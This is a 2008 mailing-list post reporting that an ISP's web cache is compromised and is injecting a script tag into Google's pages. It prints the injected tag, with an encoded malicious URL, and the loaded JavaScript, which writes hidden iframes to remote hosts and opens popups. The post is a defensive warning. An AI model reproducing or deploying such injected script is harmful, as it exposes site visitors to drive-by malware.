[General] FT Cache Compromise Details
Burhan Khalid
burhan at kuwaitnet.net
Thu Dec 4 16:41:37 +03 2008
I don't think I need to say this, but do not click on any links in this
email.
Salaam All:
Just as a reminder, as of this email date, the cache is still
compromised (see paste below).
[burhan at t61p ~]$ telnet google.com 80
Trying 72.14.205.100...
Connected to google.com.
Escape character is '^]'.
GET / HTTP/1.1
Host: www.google.com
HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie:
PREF=ID=08e985e2eb9bfbbe:TM=1228395740:LM=1228395740:S=6SIcev5-b4ZYec5K;
expires=Sat, 04-Dec-2010 13:02:20 GMT; path=/; domain=.google.com
<script language=javascript
src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>
16e2
Apparently its loading something from a chinese website (58.53.128.82),
a javascript file, which does what normal such exploits do - loads in an
inframe content form another compromised site, and opens popups:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 1*40*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "cainibi="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "cainibi=chongxinzuo;expires="+ Then.toGMTString()
document.write("<div style=\"display:none\">");
document.write("<iframe src=http://se.c66a.cn/ width=0 height=0></iframe>");
window.open("http://liaobamm.com");
}
}
document.write("<iframe src=http://w.c66d.cn/logo.htm width=100
height=0></iframe>");
Get();
If anyone has an inside ear on FT, tell them to block access at their
firewall to the offending IPs. Hell, they block Skype, why can't they
block something I don't want.
Enjoy,
--
Burhan Khalid
More information about the General
mailing list